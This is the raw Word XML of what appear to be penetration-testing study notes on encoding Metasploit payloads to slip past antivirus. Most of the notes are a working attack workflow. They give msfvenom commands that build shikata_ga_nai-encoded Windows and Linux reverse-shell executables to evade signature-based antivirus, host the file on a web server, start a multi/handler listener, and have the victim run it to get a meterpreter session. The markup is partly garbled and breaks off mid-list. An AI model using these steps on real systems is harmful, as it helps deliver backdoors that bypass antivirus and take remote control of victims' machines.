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C777" w14:textId="5E6A61AC" w:rsidR="00853ABF" w:rsidRPr="00BE589E" w:rsidRDefault="00BE589E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE589E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding Payloads with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE589E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE589E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22552A30" w14:textId="77777777" w:rsidR="00BE589E" w:rsidRDefault="00BE589E"/>
    <w:p w14:paraId="12FBCFD5" w14:textId="133BD8A0" w:rsidR="00BE589E" w:rsidRDefault="00BE589E">
      <w:r>
        <w:t xml:space="preserve">This will help in evading the </w:t>
      </w:r>
      <w:r w:rsidR="00385F33">
        <w:t xml:space="preserve">signature-based </w:t>
      </w:r>
      <w:r>
        <w:t>AV</w:t>
      </w:r>
      <w:r w:rsidR="00385F33">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C4A93" w14:textId="77777777" w:rsidR="00385F33" w:rsidRDefault="00385F33"/>
    <w:p w14:paraId="193C8B63" w14:textId="202C199D" w:rsidR="00A0641C" w:rsidRPr="004105EF" w:rsidRDefault="00A0641C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004105EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B208402" w14:textId="06CD9441" w:rsidR="00A0641C" w:rsidRDefault="00A0641C">
      <w:r>
        <w:t xml:space="preserve">Process of Modifying the payload </w:t>
      </w:r>
      <w:r w:rsidR="004105EF">
        <w:t>shellcode with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the objective of changing </w:t>
      </w:r>
      <w:r w:rsidR="004105EF">
        <w:t>payload signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEDB2BE" w14:textId="45619A16" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t>1 byte = change signature vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D251BA6" w14:textId="6BBD21B9" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t xml:space="preserve">In Some cases, it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>evade</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the older AV solution with older signature databases</w:t>
      </w:r>
      <w:r w:rsidR="00471F1D">
        <w:t xml:space="preserve">, the chance of modern is very </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00471F1D">
        <w:t>very</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471F1D">
        <w:t xml:space="preserve"> little.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12567C4E" w14:textId="77777777" w:rsidR="004105EF" w:rsidRDefault="004105EF"/>
    <w:p w14:paraId="0BFE72EE" w14:textId="36E7C457" w:rsidR="004105EF" w:rsidRPr="004105EF" w:rsidRDefault="004105EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004105EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82B1FE" w14:textId="0EA16B7C" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t>It is essential to payload / code within the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC38E6" w14:textId="0839F978" w:rsidR="004105EF" w:rsidRPr="004105EF" w:rsidRDefault="004105EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004105EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41155685" w14:textId="1027E30C" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload contain the code, that code is </w:t>
      </w:r>
      <w:r w:rsidR="00471F1D">
        <w:t>shell code</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA2A28F" w14:textId="6E1BF1BA" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611A3E0" w14:textId="4343AE31" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC52B78" w14:textId="1DD0F94F" w:rsidR="004105EF" w:rsidRDefault="004105EF"/>
    <w:p w14:paraId="10BE0360" w14:textId="2B73E80A" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00471F1D">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>list encoders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A89862D" w14:textId="58970EDD" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> out encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A17201" w14:textId="44F23C82" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t># in our case the best options are the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” encoder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662EAD1" w14:textId="6E8AC811" w:rsidR="00AB42AF" w:rsidRDefault="00471F1D">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00471F1D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata_ga_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  work only for the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>32 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA7032" w14:textId="1CDBC6B6" w:rsidR="004105EF" w:rsidRPr="00AB42AF" w:rsidRDefault="00AB42AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB42AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WINDOW PAYLAODS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BDE5C6" w14:textId="77777777" w:rsidR="004105EF" w:rsidRDefault="004105EF"/>
    <w:p w14:paraId="4457ACDF" w14:textId="225079F4" w:rsidR="004105EF" w:rsidRDefault="004105EF">
      <w:r>
        <w:t>#x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B52176E" w14:textId="675995F9" w:rsidR="008662C1" w:rsidRDefault="004105EF"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 =</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT= 1234 -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata</w:t>
      </w:r>
      <w:r w:rsidR="008662C1">
        <w:t>_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008662C1">
        <w:t xml:space="preserve"> -f exe &gt;~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008662C1">
        <w:t>windows_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008662C1">
        <w:t>/encodedx86.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628277CB" w14:textId="4656338B" w:rsidR="00385F33" w:rsidRDefault="004105EF" w:rsidP="008662C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5295"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encoder </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>work</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> only for the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>32 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload.</w:t>
      </w:r>
      <w:r w:rsidR="008662C1">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6305B8D0" w14:textId="4E2B0DBE" w:rsidR="008662C1" w:rsidRDefault="008662C1" w:rsidP="008662C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5295"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># -e is for encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6642A1F9" w14:textId="77777777" w:rsidR="008662C1" w:rsidRDefault="008662C1"/>
    <w:p w14:paraId="5DD0AB70" w14:textId="3AAF48B3" w:rsidR="008662C1" w:rsidRPr="008662C1" w:rsidRDefault="008662C1">
      <w:r>
        <w:t># shown in the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDECECD" w14:textId="40ECF71B" w:rsidR="008662C1" w:rsidRPr="008662C1" w:rsidRDefault="008662C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008662C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Iteration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D750F3A" w14:textId="6C819EFA" w:rsidR="008662C1" w:rsidRDefault="008662C1">
      <w:r>
        <w:t xml:space="preserve">Increasing the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="008662C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Iteration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the more the chances of </w:t>
      </w:r>
      <w:r w:rsidRPr="008662C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evading the AV</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843A679" w14:textId="77777777" w:rsidR="008662C1" w:rsidRDefault="008662C1" w:rsidP="008662C1"/>
    <w:p w14:paraId="636DADBB" w14:textId="690C4967" w:rsidR="008662C1" w:rsidRDefault="008662C1" w:rsidP="008662C1"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 =</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT= 1234 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10 -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -f exe &gt;~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/encodedx86.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134056C3" w14:textId="36F76142" w:rsidR="008662C1" w:rsidRDefault="008662C1">
      <w:r>
        <w:t>#-i</w:t>
      </w:r>
      <w:r w:rsidR="00FC0AEF">
        <w:t>/ --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FC0AEF">
        <w:t xml:space="preserve">iteration </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> used to set the </w:t>
      </w:r>
      <w:r w:rsidR="00471F1D">
        <w:t>iterations</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B48F69" w14:textId="77777777" w:rsidR="008662C1" w:rsidRDefault="008662C1"/>
    <w:p w14:paraId="6E45B6A8" w14:textId="1E9E62DB" w:rsidR="00AB42AF" w:rsidRPr="00AB42AF" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LINUX</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB42AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PAYLAODS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B23FA4A" w14:textId="556332E9" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF"/>
    <w:p w14:paraId="2A745928" w14:textId="6B16C021" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>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 =</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT= 1234 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10 -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -f elf &gt;~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/encodedx86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C34EA" w14:textId="77777777" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF"/>
    <w:p w14:paraId="69F031D2" w14:textId="3374AED5" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF">
      <w:r>
        <w:t># Generate the payload and then encode it with (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata_ga_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)  10</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182628FF" w14:textId="77777777" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF"/>
    <w:p w14:paraId="03C9BFB9" w14:textId="77777777" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF"/>
    <w:p w14:paraId="7B95716D" w14:textId="69EBCB13" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF" w:rsidP="00AB42AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB42AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on window</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB42AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A147786" w14:textId="2643DD26" w:rsidR="00AB42AF" w:rsidRPr="00F918E0" w:rsidRDefault="00AB42AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F918E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3826C46F" w14:textId="4761E694" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF">
      <w:r>
        <w:t xml:space="preserve">Sudo python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>simpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4F138C" w14:textId="382F6CFB" w:rsidR="00F918E0" w:rsidRDefault="00F918E0">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> location where it will run it make </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it  accessible</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on other </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE19BD0" w14:textId="77777777" w:rsidR="00F918E0" w:rsidRDefault="00F918E0"/>
    <w:p w14:paraId="28E19E78" w14:textId="783CAF3D" w:rsidR="00AB42AF" w:rsidRPr="00F918E0" w:rsidRDefault="00AB42AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F918E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Then set up listener on kail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD98B1" w14:textId="77777777" w:rsidR="00F918E0" w:rsidRDefault="00F918E0"/>
    <w:p w14:paraId="56561F10" w14:textId="1468DC06" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F7E878" w14:textId="4CC004CF" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF4263" w14:textId="79753C26" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>payload  windows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>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65BE62EB" w14:textId="43D66EE3" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF">
      <w:r>
        <w:t xml:space="preserve">Show </w:t>
      </w:r>
      <w:r w:rsidR="00F918E0">
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751EB15" w14:textId="663827C6" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aattacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="434007BE" w14:textId="65F2C2C9" w:rsidR="00AB42AF" w:rsidRDefault="00AB42AF">
      <w:r>
        <w:t>Set LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E6981" w14:textId="45988EA8" w:rsidR="00AB42AF" w:rsidRDefault="00F918E0">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53213876" w14:textId="7141F893" w:rsidR="00F918E0" w:rsidRDefault="00F918E0"/>
    <w:p w14:paraId="0F29DA7C" w14:textId="358E7A3C" w:rsidR="00F918E0" w:rsidRDefault="00F918E0">
      <w:r>
        <w:t>Go  to window system(victim):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0D3FE" w14:textId="730CEEF7" w:rsidR="00F918E0" w:rsidRDefault="00F918E0">
      <w:r>
        <w:t>Visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5851FE1C" w14:textId="67E987AA" w:rsidR="00F918E0" w:rsidRDefault="00F918E0">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007F6F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://target_ip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33D80471" w14:textId="77777777" w:rsidR="00F918E0" w:rsidRDefault="00F918E0"/>
    <w:p w14:paraId="2B4A7D89" w14:textId="7FB9177E" w:rsidR="00F918E0" w:rsidRDefault="00F918E0">
      <w:r>
        <w:t>and download the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EE0F65" w14:textId="6ED13AB1" w:rsidR="00F918E0" w:rsidRDefault="00F918E0">
      <w:r>
        <w:t>click on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA9CD2" w14:textId="77777777" w:rsidR="00F918E0" w:rsidRDefault="00F918E0"/>
    <w:p w14:paraId="4E8F8C3F" w14:textId="2ED7F35C" w:rsidR="00F918E0" w:rsidRDefault="00F918E0">
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> us </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session in kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B1270" w14:textId="0C69FA54" w:rsidR="00F918E0" w:rsidRDefault="00F918E0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69BB46E1" w14:textId="77777777" w:rsidR="00385F33" w:rsidRDefault="00385F33"/>
    <w:p w14:paraId="67652A40" w14:textId="6FCD2782" w:rsidR="00385F33" w:rsidRPr="00385F33" w:rsidRDefault="00385F33">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385F33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEF6DE" w14:textId="1001A21D" w:rsidR="00385F33" w:rsidRDefault="00385F33" w:rsidP="00385F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>AV solutions like malware bits, window defender, 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00385F33">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> party AV solutions that are designed for end user systems typically utilize signature-based detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5C758" w14:textId="24758033" w:rsidR="00385F33" w:rsidRDefault="00385F33" w:rsidP="00385F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evade Old SB- AV by encoding the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>payloads.</w:t>
      </w:r>
      <w:r w:rsidR="00CB0647">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CB0647">
        <w:t>less chances now a days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E716EFD" w14:textId="77777777" w:rsidR="00650CB7" w:rsidRDefault="00650CB7" w:rsidP="00385F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B64D9C1" w14:textId="00706E76" w:rsidR="00650CB7" w:rsidRDefault="00650CB7" w:rsidP="00385F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">signature-based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17DC41" w14:textId="77777777" w:rsidR="00650CB7" w:rsidRPr="00650CB7" w:rsidRDefault="00650CB7" w:rsidP="00650CB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7540"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00650CB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00650CB7">
        <w:t xml:space="preserve"> → calculates a unique hash (MD5, SHA256, etc.) of a file’s contents; if even </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00650CB7">
        <w:t>1 byte</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00650CB7">
        <w:t xml:space="preserve"> changes, the hash changes. Used for exact identification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0069A207" w14:textId="77777777" w:rsidR="00650CB7" w:rsidRPr="00650CB7" w:rsidRDefault="00650CB7" w:rsidP="00650CB7">
      <w:pPr>
        <w:numPr>
